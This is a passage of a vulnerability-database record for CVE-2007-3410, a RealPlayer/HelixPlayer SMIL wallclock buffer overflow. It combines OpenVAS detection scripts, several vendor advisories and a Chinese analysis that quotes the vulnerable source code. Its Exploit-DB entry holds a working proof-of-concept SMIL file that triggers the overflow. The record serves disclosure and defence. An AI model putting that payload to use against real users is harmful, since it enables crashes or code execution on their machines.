script_id(58602);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-3410\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200709-05 (realplayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-video/realplayer\", unaffected: make_list(\"ge 10.0.9\"), vulnerable: make_list(\"lt 10.0.9\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:10", "references": [], "pluginID": "60115", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Ports: linux-realplayer", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2264", "CVE-2007-2263", "CVE-2007-5081", "CVE-2007-3410"], "modified": "2016-09-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=60115", "id": "OPENVAS:60115", "sourceData": "#\n#VID f762ccbb-baed-11dc-a302-000102cc8983\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: linux-realplayer\n\nCVE-2007-5081\nHeap-based buffer overflow in RealNetworks RealPlayer 8, 10, 10.1, and\npossibly 10.5; RealOne Player 1 and 2; and RealPlayer Enterprise\nallows remote attackers to execute arbitrary code via a crafted RM\nfile.\nCVE-2007-3410\nStack-based buffer overflow in the SmilTimeValue::parseWallClockValue\nfunction in smlprstime.cpp in RealNetworks RealPlayer 10, 10.1, and\npossibly 10.5, RealOne Player, RealPlayer Enterprise, and Helix Player\n10.5-GOLD and 10.0.5 through 10.0.8, allows remote attackers to\nexecute arbitrary code via an SMIL (SMIL2) file with a long wallclock\nvalue.\nCVE-2007-2263\nHeap-based buffer overflow in RealNetworks RealPlayer 10.0, 10.1, and\npossibly 10.5, RealOne Player, and RealPlayer Enterprise allows remote\nattackers to execute arbitrary code via an SWF (Flash) file with\nmalformed record headers.\nCVE-2007-2264\nHeap-based buffer overflow in RealNetworks RealPlayer 8, 10, 10.1, and\npossibly 10.5; RealOne Player 1 and 2; and RealPlayer Enterprise\nallows remote attackers to execute arbitrary code via a RAM (.ra or\n.ram) file with a large size value in the RA header.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/27361\nhttp://service.real.com/realplayer/security/10252007_player/en/\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-063.html\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-062.html\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-061.html\nhttp://secunia.com/advisories/25819/\nhttp://www.vuxml.org/freebsd/f762ccbb-baed-11dc-a302-000102cc8983.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(60115);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-5081\", \"CVE-2007-3410\", \"CVE-2007-2263\", \"CVE-2007-2264\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-realplayer\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-realplayer\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.0.5\")>=0 && revcomp(a:bver, b:\"10.0.9.809.20070726\")<0) {\n txt += 'Package linux-realplayer version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:02:05", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 24658\r\nCVE(CAN) ID: CVE-2007-3410\r\n\r\nRealPlayer\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5a92\u4f53\u64ad\u653e\u5668\uff0c\u652f\u6301\u591a\u79cd\u683c\u5f0f\uff1bHelixPlayer\u662f\u5176\u5f00\u6e90\u7248\u672c\u3002\r\n\r\nRealPlayer/HelixPlayer\u64ad\u653e\u5668\u7684\u5899\u58c1\u65f6\u949f\u5728\u5904\u7406\u65e5\u671f\u683c\u5f0f\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u7528\u6237\u673a\u5668\u3002\r\n\r\n\u5899\u58c1\u65f6\u949f\uff08wallclock\uff09\u529f\u80fd\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406HH:mm:ss.f\u65f6\u95f4\u683c\u5f0f\uff1a \r\n\r\n 924 HX_RESULT\r\n 925 SmilTimeValue::parseWallClockValue(REF(const char*) pCh)\r\n 926 {\r\n ...\r\n 957 char buf[10]; /* Flawfinder: ignore */\r\n ...\r\n 962 while (*pCh)\r\n 963 {\r\n ...\r\n 972 else if (isspace(*pCh) || *pCh == '+' || *pCh == '-' || *pCh == 'Z')\r\n 973 {\r\n 974 // this will find the last +, - or Z... which is what we want.\r\n 975 pTimeZone = pCh;\r\n 976 }\r\n ...\r\n 982 ++pCh;\r\n 983 }\r\n ...\r\n 1101 if (pTimePos)\r\n 1102 {\r\n 1103 //HH:MM...\r\n ....\r\n 1133 if (*(pos-1) == ':')\r\n 1134 {\r\n ....\r\n 1148 if (*(pos-1) == '.')\r\n 1149 {\r\n 1150 // find end.\r\n 1151 UINT32 len = 0;\r\n 1152 if (pTimeZone)\r\n 1153 {\r\n 1154 len = pTimeZone - pos;\r\n 1155 }\r\n 1156 else\r\n 1157 {\r\n 1158 len = end - pos;\r\n 1159 }\r\n 1160 strncpy(buf, pos, len); /* Flawfinder: ignore */\r\n\r\n\u5728957\u884c\u6808\u7f13\u51b2\u533a\u58f0\u660e\u4e3a10\u5b57\u8282\uff0c\u8be5\u884c\u7684\u6807\u6ce8\u5bfc\u81f4FlawFinder\u7a0b\u5e8f\u5ffd\u7565\u8fd9\u4e2a\u7f13\u51b2\u533a\u3002 \r\n\r\n962\u884c\u5f00\u59cb\u7684\u5faa\u73af\u901a\u8fc7\u4e00\u4e2a\u51fd\u6570\u53c2\u6570\u8fd0\u884c\uff0c\u8be5\u51fd\u6570\u7528\u4e8e\u5bfb\u627e\u8868\u793a\u65f6\u95f4\u683c\u5f0f\u4e2d\u4e0d\u540c\u90e8\u5206\u7684\u5b57\u7b26\u3002\u5982\u679c\u9047\u5230\u4e86\u7a7a\u683c\u3001\u201c+\u201d\u3001\u201c-\u201d\u3001\u6216\u201cZ\u201d\u5b57\u7b26\uff0c\u5c31\u4f1a\u8bb0\u5f55\u4e0b\u4f4d\u7f6e\u4ee5\u5907\u4e4b\u540e\u4f7f\u7528\u3002\u5982\u679c\u627e\u5230\u4e86\u65f6\u95f4\u4e14\u5305\u542b\u6709\u5192\u53f7\u548c\u9017\u53f7\uff0c\u5c31\u4f1a\u5230\u8fbe\u6709\u6f0f\u6d1e\u7684\u4ee3\u7801\u3002\r\n\r\n1154\u62161158\u884c\u8ba1\u7b97\u5c06\u8981\u62f7\u8d1d\u5230\u6808\u7f13\u51b2\u533a\u7684\u6570\u636e\u957f\u5ea6\uff0c\u5177\u4f53\u53d6\u51b3\u4e8e\u662f\u5426\u5b58\u5728\u65f6\u533a\u3002\u8fd9\u4e24\u5904\u8ba1\u7b97\u90fd\u6ca1\u6709\u8003\u8651buf\u7f13\u51b2\u533a\u7684\u5e38\u6570\u957f\u5ea6\uff0c\u56e0\u6b64\u57281160\u884c\u53ef\u80fd\u51fa\u73b0\u6808\u6ea2\u51fa\u3002\u6b64\u5916\uff0c\u8be5\u884c\u4e0d\u5b89\u5168\u5730\u4f7f\u7528strncpy()\u4e5f\u88ab\u6807\u8bb0\u4e86\u5ffd\u7565FlawFinder\u7684\u6807\u6ce8\u3002\r\n\r\n\u5982\u679c\u7528\u6237\u53d7\u9a97\u4f7f\u7528\u6709\u6f0f\u6d1e\u7684\u64ad\u653e\u5668\u52a0\u8f7d\u4e86\u540c\u6b65\u591a\u5a92\u4f53\u96c6\u6210\u8bed\u8a00\uff08SMIL\uff09\u6587\u4ef6\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\n\nReal Networks RealPlayer 10.5-GOLD \r\nReal Networks Helix Player 10.5-GOLD\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u4e3aCLSID CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA\u8bbe\u7f6ekill-bit\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nReal Networks\r\n-------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://www.real.com\" target=\"_blank\">http://www.real.com</a>", "reporter": "Root", "published": "2007-06-28T00:00:00", "title": "RealPlayer/HelixPlayer ParseWallClockValue\u51fd\u6570\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-06-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-1930", "id": "SSV:1930", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=183421", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.9", "packageName": "media-video/realplayer", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nRealPlayer is a multimedia player capable of handling multiple multimedia file formats. \n\n### Description\n\nA stack-based buffer overflow vulnerability has been reported in the SmilTimeValue::parseWallClockValue() function in smlprstime.cpp when handling HH:mm:ss.f type time formats. \n\n### Impact\n\nBy enticing a user to open a specially crafted SMIL (Synchronized Multimedia Integration Language) file, an attacker could be able to execute arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll RealPlayer users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/realplayer-10.0.9\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2007-09-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "gentoo", "title": "RealPlayer: Buffer overflow", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3410"], "modified": "2007-09-14T00:00:00", "id": "GLSA-200709-05", "href": "https://security.gentoo.org/glsa/200709-05", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "references": [], "description": "Added: 06/29/2007 \nCVE: [CVE-2007-3410](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410>) \nBID: [24658](<http://www.securityfocus.com/bid/24658>) \nOSVDB: [37374](<http://www.osvdb.org/37374>) \n\n\n### Background\n\nRealPlayer includes support for Synchronized Multimedia Integration Language (SMIL) files. \n\n### Problem\n\nA buffer overflow vulnerability in the wallclock function could allow command execution upon opening a specially crafted SMIL file. \n\n### Resolution\n\nUpdate to a fixed version of RealPlayer by selecting Check for Update under the Help menu in RealPlayer. \n\n### References\n\n<http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 Gold and requires a user to open the exploit file in Internet Explorer 6 or 7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2007-06-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "saint", "title": "RealPlayer SMIL file wallclock buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-29T00:00:00", "id": "SAINT:E01BFCF2621FC36EB45091F4EE8DA493", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/realplayer_smil_wallclock", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-10T14:03:41", "references": [], "edition": 1, "description": "Added: 06/29/2007 \nCVE: [CVE-2007-3410](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410>) \nBID: [24658](<http://www.securityfocus.com/bid/24658>) \nOSVDB: [37374](<http://www.osvdb.org/37374>) \n\n\n### Background\n\nRealPlayer includes support for Synchronized Multimedia Integration Language (SMIL) files. \n\n### Problem\n\nA buffer overflow vulnerability in the wallclock function could allow command execution upon opening a specially crafted SMIL file. \n\n### Resolution\n\nUpdate to a fixed version of RealPlayer by selecting Check for Update under the Help menu in RealPlayer. \n\n### References\n\n<http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 Gold and requires a user to open the exploit file in Internet Explorer 6 or 7. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2007-06-29T00:00:00", "title": "RealPlayer SMIL file wallclock buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-29T00:00:00", "id": "SAINT:60890704B26EDE87E6FA037907CFA531", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/realplayer_smil_wallclock", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:05", "references": [], "edition": 1, "description": "Added: 06/29/2007 \nCVE: [CVE-2007-3410](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410>) \nBID: [24658](<http://www.securityfocus.com/bid/24658>) \nOSVDB: [37374](<http://www.osvdb.org/37374>) \n\n\n### Background\n\nRealPlayer includes support for Synchronized Multimedia Integration Language (SMIL) files. \n\n### Problem\n\nA buffer overflow vulnerability in the wallclock function could allow command execution upon opening a specially crafted SMIL file. \n\n### Resolution\n\nUpdate to a fixed version of RealPlayer by selecting Check for Update under the Help menu in RealPlayer. \n\n### References\n\n<http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 Gold and requires a user to open the exploit file in Internet Explorer 6 or 7. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2007-06-29T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "RealPlayer SMIL file wallclock buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-29T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/realplayer_smil_wallclock", "id": "SAINT:8CC7664D64C422281AA11FC091C00C94", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2017-09-09T07:20:04", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageName": "HelixPlayer", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageName": "HelixPlayer", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageName": "HelixPlayer", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.src.rpm", "arch": "src", "operator": "lt"}], "description": "HelixPlayer is a media player.\r\n\r\nA buffer overflow flaw was found in the way HelixPlayer processed\r\nSynchronized Multimedia Integration Language (SMIL) files. It was possible\r\nfor a malformed SMIL file to execute arbitrary code with the permissions of\r\nthe user running HelixPlayer. (CVE-2007-3410)\r\n\r\nAll users of HelixPlayer are advised to upgrade to this updated package,\r\nwhich contains a backported patch and is not vulnerable to this issue.", "reporter": "RedHat", "published": "2007-06-27T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "redhat", "title": "(RHSA-2007:0605) Critical: HelixPlayer security update", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3410"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:19:36", "id": "RHSA-2007:0605", "href": "https://access.redhat.com/errata/RHSA-2007:0605", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-27T21:41:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "10.0.9-3.el5", "arch": "i386", "packageName": "RealPlayer", "packageFilename": "RealPlayer-10.0.9-3.el5.i386.rpm", "operator": "lt"}], "description": "RealPlayer is a media player that provides media playback locally and via\r\nstreaming.\r\n\r\nA buffer overflow flaw was found in the way RealPlayer processed\r\nSynchronized Multimedia Integration Language (SMIL) files. It was possible\r\nfor a malformed SMIL file to execute arbitrary code with the permissions of\r\nthe user running RealPlayer. (CVE-2007-3410)\r\n\r\nAll users of RealPlayer are advised to upgrade to this updated package\r\ncontaining RealPlayer version 10.0.9 which is not vulnerable to this issue.", "reporter": "RedHat", "published": "2007-08-17T04:00:00", "type": "redhat", "title": "(RHSA-2007:0841) Critical: RealPlayer security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2007-2263", "CVE-2007-2264", "CVE-2007-3410", "CVE-2007-5081"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:19", "id": "RHSA-2007:0841", "href": "https://access.redhat.com/errata/RHSA-2007:0841", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:11:49", "osvdbidlist": ["37374"], "references": [], "description": "RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC. CVE-2007-3410. Dos exploit for windows platform", "edition": 1, "reporter": "axis", "published": "2007-06-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-27T00:00:00", "id": "EDB-ID:4118", "href": "https://www.exploit-db.com/exploits/4118/", "sourceData": "<!--\nauthor:\taxis\nsite: http://www.ph4nt0m.org\n-->\n\n<smil xmlns=\"http://www.w3.org/2000/SMIL20/CR/Language\">\n <body>\n <par>\n <img src=\"./1.jpg\" begin=\"wallclock(12:00:00.999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999+9)\" dur=\"5s\"/>\n </par>\n </body>\n</smil>\n\n# milw0rm.com [2007-06-27]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4118/"}], "freebsd": [{"lastseen": "2016-09-26T17:24:58", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-07-062.html", "http://www.zerodayinitiative.com/advisories/ZDI-07-061.html", "http://www.zerodayinitiative.com/advisories/ZDI-07-063.html", "http://secunia.com/advisories/25819/", "http://secunia.com/advisories/27361", "http://service.real.com/realplayer/security/10252007_player/en/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "10.0.5", "packageFilename": "UNKNOWN", "packageName": "linux-realplayer", "arch": "noarch", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "10.0.9.809.20070726", "packageFilename": "UNKNOWN", "packageName": "linux-realplayer", "arch": "noarch", "operator": "lt"}], "edition": 1, "description": "\nSecunia reports:\n\nMultiple vulnerabilities have been reported in\n\t RealPlayer/RealOne/HelixPlayer, which can be exploited by malicious\n\t people to compromise a user's system.\nAn input validation error when processing .RA/.RAM files can be\n\t exploited to cause a heap corruption via a specially crafted\n\t .RA/.RAM file with an overly large size field in the header.\nAn error in the processing of .PLS files can be exploited to cause\n\t a memory corruption and execute arbitrary code via a specially\n\t crafted .PLS file.\nAn input validation error when parsing .SWF files can be exploited\n\t to cause a buffer overflow via a specially crafted .SWF file with\n\t malformed record headers.\nA boundary error when processing rm files can be exploited to\n\t cause a buffer overflow.\n\n", "reporter": "FreeBSD", "published": "2007-10-25T00:00:00", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "linux-realplayer -- multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2264", "CVE-2007-2263", "CVE-2007-5081", "CVE-2007-3410"], "modified": "2007-10-25T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/f762ccbb-baed-11dc-a302-000102cc8983.html", "id": "F762CCBB-BAED-11DC-A302-000102CC8983", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}}